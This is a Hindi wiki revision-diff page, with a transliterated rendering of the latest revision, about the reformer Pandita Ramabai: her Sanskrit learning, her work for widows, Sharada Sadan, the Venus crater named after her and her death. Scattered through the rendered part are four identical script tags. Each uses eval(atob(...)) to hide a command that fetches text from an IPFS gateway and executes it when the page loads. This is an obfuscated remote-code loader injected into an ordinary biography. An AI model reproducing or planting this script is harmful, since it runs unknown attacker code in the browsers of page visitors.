Difference between revisions of "पंडिता रमाबाई"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " हजार " to " हज़ार ")
m (Text replacement - " गरीब" to " ग़रीब")
 
(17 intermediate revisions by 6 users not shown)
Line 1: Line 1:
पंडिता रमाबाई (जन्म अप्रैल, 1858 ई.-निधन 5 अप्रैल, 1922 ई.) प्रख्यात विदुषी समाजसुधारक और भारतीय नारियों को उनकी पिछड़ी हुई स्थिति से ऊपर उठाने के लिए समर्पित थीं। पंडिता रमाबाई का जन्म अप्रैल, 1858 ई. में [[मैसूर]] रियासत में हुआ था। उनके पिता 'अनंत शास्त्री' विद्वान और स्त्री-शिक्षा के समर्थक थे। परन्तु उस समय की पारिवारिक रूढ़िवादिता इसमें बाधा बनी रही। पिता रमा के बचपन में ही साधु-संतों की मेहमानदारी के कारण निर्धन हो गए और उन्हें पत्नी तथा रमा की एक बहन और भाई के साथ गांव-गांव में पौराणिक कथाएँ सुनाकर पेट पालना पड़ा।
+
{{सूचना बक्सा प्रसिद्ध व्यक्तित्व
==विद्वान रमा==
+
|चित्र=Pandita-Ramabai.jpg
{{tocright}}
+
|चित्र का नाम=पंडिता रमाबाई मेधावी
रमाबाई असाधारण प्रतिभावान थी। अपने पिता से [[संस्कृत]] [[भाषा]] का ज्ञान प्राप्त करके 12 वर्ष की उम्र में ही 20 हज़ार [[श्लोक]] कंठस्थ कर लिए थे। देशाटन के कारण उसने [[मराठी भाषा|मराठी]] के साथ-साथ [[कन्नड़]], [[हिन्दी]], तथा [[बांग्ला भाषा|बंगला]] भाषाएँ भी सीख लीं। उसके संस्कृत के ज्ञान के लिए रमाबाई को '''सरस्वती''' और '''पंडिता''' की उपाधियाँ प्राप्त हुई। तभी से वे पंडिता रमाबाई के नाम से जानी गई। 1876-77 के भीषण अकाल में दुर्बल पिता और माता का शीघ्र ही देहांत हो गया। अब ये बच्चे पैदल भटकते रहे और तीन [[वर्ष]] में इन्होंने 4 हज़ार मील की यात्रा की।
+
|पूरा नाम=पंडिता रमाबाई मेधावी
 
+
|अन्य नाम=
 +
|जन्म= [[23 अप्रैल]], [[1858]] ई.  
 +
|जन्म भूमि=[[मैसूर]]
 +
|मृत्यु=[[5 अप्रैल]], [[1922]] ई.  
 +
|मृत्यु स्थान=[[महाराष्ट्र]]
 +
|अभिभावक='अनंत शास्त्री'
 +
|पति/पत्नी=
 +
|संतान=
 +
|गुरु=
 +
|कर्म भूमि=[[भारत]]
 +
|कर्म-क्षेत्र=समाज सुधारक
 +
|मुख्य रचनाएँ=
 +
|विषय=
 +
|खोज=
 +
|भाषा= [[मराठी भाषा|मराठी]], [[कन्नड़]], [[हिन्दी]] और [[बांग्ला भाषा|बंगला]]
 +
|शिक्षा=
 +
|विद्यालय=
 +
|पुरस्कार-उपाधि='सरस्वती', 'पंडिता' और "कैसर-ए-हिंदी"
 +
|प्रसिद्धि=
 +
|विशेष योगदान=
 +
|नागरिकता=भारतीय
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|शीर्षक 3=
 +
|पाठ 3=
 +
|शीर्षक 4=
 +
|पाठ 4=
 +
|शीर्षक 5=
 +
|पाठ 5=
 +
|अन्य जानकारी=[[अमेरिका]] में उनके प्रयत्न से '''रमाबाई एसोसिएशन''' बना जिसने [[भारत]] के विधवा आश्रम का 10 वर्ष तक खर्च चलाने का जिम्मा लिया।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''पंडिता रमाबाई मेधावी''' ([[अंग्रेज़ी]]: '''Pandita Ramabai Medhavi''', जन्म: [[23 अप्रॅल]], [[1858]]; मृत्यु: [[5 अप्रैल]], [[1922]]) प्रख्यात विदुषी समाजसुधारक और भारतीय नारियों को उनकी पिछड़ी हुई स्थिति से ऊपर उठाने के लिए समर्पित थीं। मेधावी क्रेटर का नाम रामाबाई मेधावी के नाम पर रखा गया।
 +
==परिचय==
 +
पंडिता रमाबाई मेधावी का जन्म 23 अप्रैल, 1858 ई. में [[मैसूर]] रियासत में हुआ था। उनके [[पिता]] 'अनंत शास्त्री' विद्वान् और स्त्री-शिक्षा के समर्थक थे। परन्तु उस समय की पारिवारिक रूढ़िवादिता इसमें बाधा बनी रही। पिता रमा के बचपन में ही साधु-संतों की मेहमानदारी के कारण निर्धन हो गए और उन्हें पत्नी तथा रमा की एक बहन और भाई के साथ गांव-गांव में पौराणिक कथाएँ सुनाकर पेट पालना पड़ा।  
 +
==विद्वान् रमा==
 +
पंडिता रमाबाई असाधारण प्रतिभावान थी। अपने पिता से [[संस्कृत]] [[भाषा]] का ज्ञान प्राप्त करके 12 वर्ष की उम्र में ही 20 हज़ार [[श्लोक]] कंठस्थ कर लिए थे। देशाटन के कारण उसने [[मराठी भाषा|मराठी]] के साथ-साथ [[कन्नड़]], [[हिन्दी]], तथा [[बांग्ला भाषा|बंगला]] भाषाएँ भी सीख लीं। 20 वर्ष की उम्र में ही रमाबाई को संस्कृत के ज्ञान के लिए '''सरस्वती''' और '''पंडिता''' की उपाधियाँ प्राप्त हुई। तभी से वे पंडिता रमाबाई के नाम से जानी गई। [[1876]]-[[1877]] के भीषण अकाल में दुर्बल पिता और माता का शीघ्र ही देहांत हो गया। अब ये बच्चे पैदल भटकते रहे और तीन [[वर्ष]] में इन्होंने 4 हज़ार मील की यात्रा की। 22 साल में शादी होने के बाद उन्होंने बाल विवाह के विरोध में और विधवाओं के हालातों पर बोलना शुरू किया। मेडिकल की उपाधि हासिल करके वो [[ब्रिटेन]] गईं। यूएस गईं और स्नातक की उपाधि ली। पति की मौत के बाद उन्‍होंने [[पुणे]] में आर्य महिला समाज की स्थापना की। एक कवयित्री और लेखिका बनाने के क्रम में उन्होंने जीवन में खूब यात्राएं कीं। रमाबाई सात भाषाएं जानती थीं, धर्मपरिवर्तन कर [[ईसाई]] बन गईं और उन्होंने बाइबल की अनुवाद [[मराठी]] में किया।
 
==समाज सुधारक==
 
==समाज सुधारक==
22 वर्ष की उम्र में रमाबाई [[कोलकाता]] पहुंची। उन्होंने बाल विधवाओं और विधवाओं की दयनीय दशा सुधारने का बीड़ा उठाया। उनके [[संस्कृत]] ज्ञान और भाषणों से [[बंगाल]] के समाज में हलचल मच गई। भाई की मृत्यु के बाद रमाबाई ने 'विपिन बिहारी' नामक अछूत जाति के एक वकील से विवाह किया, परन्तु एक नन्हीं बच्ची को छोड़कर डेढ़ [[वर्ष]] के बाद ही हैजे की बीमारी में वह भी चल बसा। अछूत से विवाह करने के कारण रमाबाई को कट्टरपंथियों के आक्रोश का सामना करना पड़ा और वह [[पूना]] आकर स्त्री-शिक्षा के काम में लग गई। उसकी स्थापित संस्था '''आर्य महिला समाज''' की शीघ्र ही [[महाराष्ट्र]] भर में शाखाएँ खुल गईं।
+
22 वर्ष की उम्र में पंडिता रमाबाई [[कोलकाता]] पहुंची। उन्होंने बाल विधवाओं और विधवाओं की दयनीय दशा सुधारने का बीड़ा उठाया। उनके [[संस्कृत]] ज्ञान और भाषणों से [[बंगाल]] के समाज में हलचल मच गई। भाई की मृत्यु के बाद रमाबाई ने 'विपिन बिहारी' नामक अछूत जाति के एक वकील से विवाह किया, परन्तु एक नन्हीं बच्ची को छोड़कर डेढ़ [[वर्ष]] के बाद ही हैजे की बीमारी में वह भी चल बसा। अछूत से विवाह करने के कारण रमाबाई को कट्टरपंथियों के आक्रोश का सामना करना पड़ा और वह [[पूना]] आकर स्त्री-शिक्षा के काम में लग गई। उसकी स्थापित संस्था '''आर्य महिला समाज''' की शीघ्र ही [[महाराष्ट्र]] भर में शाखाएँ खुल गईं।[[चित्र:Pandita-ramabai.jpg|thumb|left|250px|पंडिता रमाबाई]]
 +
====मेधावी क्रेटर====
 +
मेधावी क्रेटर [[शुक्र ग्रह]] के एक गड्ढे का नाम है, जिसे रमाबाई मेधावी के नाम पर रखा गया था। शुक्र ग्रह जिसे भोर का तारा भी कहा जाता है। इस ग्रह पर बहुत बड़े-बड़े गड्ढे हैं। इन गड्ढों का नाम कुछ प्रसिद्ध महिलाओं के नाम पर रखा गया है। जोशी क्रेटर का नाम भारतीय मूल की महिला आनंदी गोपाल जोशी के नाम पर रखा गया तथा वीनस पर बने जीराड क्रेटर का जेरूसा जीराड के नाम पर रखा गया।<ref>{{cite web |url= http://m.dailyhunt.in/news/india/hindi/inextlive-epaper-inextliv/isaro+se+pahale+shukr+grah+par+tin+bharatiy+mahilao+ka+nam-newsid-63953858|title=इसरो से पहले शुक्र ग्रह पर तीन भारतीय महिलाओं का नाम |accessmonthday=18 मार्च |accessyear=2017 |last= |first= |authorlink= |format= |publisher=dailyhunt |language=हिंदी }}</ref>
 
==विधवाओं के लिए कार्य==
 
==विधवाओं के लिए कार्य==
[[अंग्रेज़ी भाषा]] का ज्ञान प्राप्त करने के लिए पंडिता रमाबाई 1883 ई. में [[इंग्लैण्ड]] गईं। वहां दो वर्ष तक [[संस्कृत]] की प्रोफेसर रहने के बाद वे [[अमेरिका]] पहुंचीं। उन्होंने इंग्लैंड में [[ईसाई धर्म]] स्वीकार कर लिया था। अमेरिका में उनके प्रयत्न से '''रमाबाई एसोसिएशन''' बना जिसने [[भारत]] के विधवा आश्रम का 10 वर्ष तक खर्च चलाने का जिम्मा लिया। इसके बाद वे 1889 में भारत लौटीं और विधवाओं के लिए '''शारदा सदन''' की स्थापना की। बाद में '''कृपा सदन''' नामक एक और महिला आश्रम बनाया।
+
[[अंग्रेज़ी भाषा]] का ज्ञान प्राप्त करने के लिए पंडिता रमाबाई [[1883]] ई. में [[इंग्लैण्ड]] गईं। वहां दो वर्ष तक [[संस्कृत]] की प्रोफेसर रहने के बाद वे [[अमेरिका]] पहुंचीं। उन्होंने इंग्लैंड में [[ईसाई धर्म]] स्वीकार कर लिया था। अमेरिका में उनके प्रयत्न से '''रमाबाई एसोसिएशन''' बना जिसने [[भारत]] के विधवा आश्रम का 10 [[वर्ष]] तक खर्च चलाने का जिम्मा लिया। इसके बाद वे [[1889]] में भारत लौटीं और विधवाओं के लिए '''शारदा सदन''' की स्थापना की। बाद में '''कृपा सदन''' नामक एक और महिला आश्रम बनाया।
 
==आत्मनिर्भरता की शिक्षा==  
 
==आत्मनिर्भरता की शिक्षा==  
पंडिता रमाबाई के इन आश्रमों में अनाथ और पीड़ित महिलाओं को ऐसी शिक्षा दी जाती थी जिससे वे स्वयं अपनी जीविका उपार्जित कर सकें। पंडिता रमाबाई का जीवन इस बात का प्रमाण है कि यदि व्यक्ति दृढ़ निश्चय कर ले तो गरीबी, अभाव, दुर्दशा की स्थिति पर विजय प्राप्त करके वह अपने लक्ष्य की ओर बढ़ सकता है। उनकी सफलता का रहस्य था - प्रतिकूल परिस्थितियों में साहस के साथ संघर्ष करते रहना।  
+
पंडिता रमाबाई के इन आश्रमों में अनाथ और पीड़ित महिलाओं को ऐसी शिक्षा दी जाती थी जिससे वे स्वयं अपनी जीविका उपार्जित कर सकें। उन्होंने मुक्ति मिशन शुरू किया, जो ठुकराई गई महिलाओं-बच्चों का ठिकाना था। उन्होंने [[बंबई]] में 20 लड़कियों के साथ शारदा सदन की शुरुआत की। सन् [[1919]] में [[ब्रिटिश सरकार]] ने उन्हें "कैसर-ए-हिंदी" के तमगे से नवाजा था। पंडिता रमाबाई का जीवन इस बात का प्रमाण है कि यदि व्यक्ति दृढ़ निश्चय कर ले तो ग़रीबी, अभाव, दुर्दशा की स्थिति पर विजय प्राप्त करके वह अपने लक्ष्य की ओर बढ़ सकता है। उनकी सफलता का रहस्य था- प्रतिकूल परिस्थितियों में साहस के साथ संघर्ष करते रहना।  
 
==निधन==
 
==निधन==
5 अप्रैल, 1922 ई. को पंडिता रमाबाई का देहांत हो गया।  
+
[[5 अप्रैल]], [[1922]] ई. को पंडिता रमाबाई का देहांत हो गया।  
  
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
+
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक3|माध्यमिक= |पूर्णता= |शोध= }}
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
{{cite book | last =लीलाधर | first =शर्मा  | title =भारतीय चरित कोश  | edition = | publisher =शिक्षा भारती | location =भारतडिस्कवरी पुस्तकालय  | language =[[हिन्दी]]  | pages =451 से 452  | chapter = }}
 
{{cite book | last =लीलाधर | first =शर्मा  | title =भारतीय चरित कोश  | edition = | publisher =शिक्षा भारती | location =भारतडिस्कवरी पुस्तकालय  | language =[[हिन्दी]]  | pages =451 से 452  | chapter = }}
==बाहरी कड़ियाँ==
 
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
+
{{समाज सुधारक}}
[[Category:नया पन्ना अगस्त-2011]]
+
[[Category:समाज_सुधारक]][[Category:जीवनी साहित्य]][[Category:चरित कोश]][[Category:व्यक्ति_परिचय]][[Category:विदुषी महिलाएँ]]
 
 
 
 
[[Category:समाज_सुधारक]]
 
[[Category:चरित कोश]]
 
[[Category:व्यक्ति_परिचय]]
 
[[Category:विदुषी महिलाएँ]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 09:17, 12 April 2018

pandita ramabaee
poora nam pandita ramabaee medhavi
janm 23 aprail, 1858 ee.
janm bhoomi maisoor
mrityu 5 aprail, 1922 ee.
mrityu sthan maharashtr
abhibhavak 'anant shastri'
karm bhoomi bharat
karm-kshetr samaj sudharak
bhasha marathi, kann d, hindi aur bangala
puraskar-upadhi 'sarasvati', 'pandita' aur "kaisar-e-hiandi"
nagarikata bharatiy
any janakari amerika mean unake prayatn se ramabaee esosieshan bana jisane bharat ke vidhava ashram ka 10 varsh tak kharch chalane ka jimma liya.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

pandita ramabaee medhavi (aangrezi: Pandita Ramabai Medhavi, janm: 23 aprॅl, 1858; mrityu: 5 aprail, 1922) prakhyat vidushi samajasudharak aur bharatiy nariyoan ko unaki pichh di huee sthiti se oopar uthane ke lie samarpit thian. medhavi kretar ka nam ramabaee medhavi ke nam par rakha gaya.

parichay

pandita ramabaee medhavi ka janm 23 aprail, 1858 ee. mean maisoor riyasat mean hua tha. unake pita 'anant shastri' vidvanh aur stri-shiksha ke samarthak the. parantu us samay ki parivarik roodhivadita isamean badha bani rahi. pita rama ke bachapan mean hi sadhu-santoan ki mehamanadari ke karan nirdhan ho ge aur unhean patni tatha rama ki ek bahan aur bhaee ke sath gaanv-gaanv mean pauranik kathaean sunakar pet palana p da.

vidvanh rama

pandita ramabaee asadharan pratibhavan thi. apane pita se sanskrit bhasha ka jnan prapt karake 12 varsh ki umr mean hi 20 hazar shlok kanthasth kar lie the. deshatan ke karan usane marathi ke sath-sath kann d, hindi, tatha bangala bhashaean bhi sikh lian. 20 varsh ki umr mean hi ramabaee ko sanskrit ke jnan ke lie sarasvati aur pandita ki upadhiyaan prapt huee. tabhi se ve pandita ramabaee ke nam se jani gee. 1876-1877 ke bhishan akal mean durbal pita aur mata ka shighr hi dehaant ho gaya. ab ye bachche paidal bhatakate rahe aur tin varsh mean inhoanne 4 hazar mil ki yatra ki. 22 sal mean shadi hone ke bad unhoanne bal vivah ke virodh mean aur vidhavaoan ke halatoan par bolana shuroo kiya. medikal ki upadhi hasil karake vo briten geean. yooes geean aur snatak ki upadhi li. pati ki maut ke bad unh‍hoanne pune mean ary mahila samaj ki sthapana ki. ek kavayitri aur lekhika banane ke kram mean unhoanne jivan mean khoob yatraean kian. ramabaee sat bhashaean janati thian, dharmaparivartan kar eesaee ban geean aur unhoanne baibal ki anuvad marathi mean kiya.

samaj sudharak

22 varsh ki umr mean pandita ramabaee kolakata pahuanchi. unhoanne bal vidhavaoan aur vidhavaoan ki dayaniy dasha sudharane ka bi da uthaya. unake sanskrit jnan aur bhashanoan se bangal ke samaj mean halachal mach gee. bhaee ki mrityu ke bad ramabaee ne 'vipin bihari' namak achhoot jati ke ek vakil se vivah kiya, parantu ek nanhian bachchi ko chho dakar dedh varsh ke bad hi haije ki bimari mean vah bhi chal basa. achhoot se vivah karane ke karan ramabaee ko kattarapanthiyoan ke akrosh ka samana karana p da aur vah poona akar stri-shiksha ke kam mean lag gee. usaki sthapit sanstha ary mahila samaj ki shighr hi maharashtr bhar mean shakhaean khul geean.thumb|left|250px|pandita ramabaee

medhavi kretar

medhavi kretar shukr grah ke ek gaddhe ka nam hai, jise ramabaee medhavi ke nam par rakha gaya tha. shukr grah jise bhor ka tara bhi kaha jata hai. is grah par bahut b de-b de gaddhe haian. in gaddhoan ka nam kuchh prasiddh mahilaoan ke nam par rakha gaya hai. joshi kretar ka nam bharatiy mool ki mahila anandi gopal joshi ke nam par rakha gaya tatha vinas par bane jirad kretar ka jeroosa jirad ke nam par rakha gaya.[1]

vidhavaoan ke lie kary

aangrezi bhasha ka jnan prapt karane ke lie pandita ramabaee 1883 ee. mean ianglaind geean. vahaan do varsh tak sanskrit ki prophesar rahane ke bad ve amerika pahuanchian. unhoanne ianglaiand mean eesaee dharm svikar kar liya tha. amerika mean unake prayatn se ramabaee esosieshan bana jisane bharat ke vidhava ashram ka 10 varsh tak kharch chalane ka jimma liya. isake bad ve 1889 mean bharat lautian aur vidhavaoan ke lie sharada sadan ki sthapana ki. bad mean kripa sadan namak ek aur mahila ashram banaya.

atmanirbharata ki shiksha

pandita ramabaee ke in ashramoan mean anath aur pi dit mahilaoan ko aisi shiksha di jati thi jisase ve svayan apani jivika uparjit kar sakean. unhoanne mukti mishan shuroo kiya, jo thukaraee gee mahilaoan-bachchoan ka thikana tha. unhoanne banbee mean 20 l dakiyoan ke sath sharada sadan ki shuruat ki. sanh 1919 mean british sarakar ne unhean "kaisar-e-hiandi" ke tamage se navaja tha. pandita ramabaee ka jivan is bat ka praman hai ki yadi vyakti dridh nishchay kar le to garibi, abhav, durdasha ki sthiti par vijay prapt karake vah apane lakshy ki or badh sakata hai. unaki saphalata ka rahasy tha- pratikool paristhitiyoan mean sahas ke sath sangharsh karate rahana.

nidhan

5 aprail, 1922 ee. ko pandita ramabaee ka dehaant ho gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. isaro se pahale shukr grah par tin bharatiy mahilaoan ka nam (hiandi) dailyhunt. abhigaman tithi: 18 march, 2017.

liladhar, sharma bharatiy charit kosh (hindi). bharatadiskavari pustakalay: shiksha bharati, 451 se 452.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>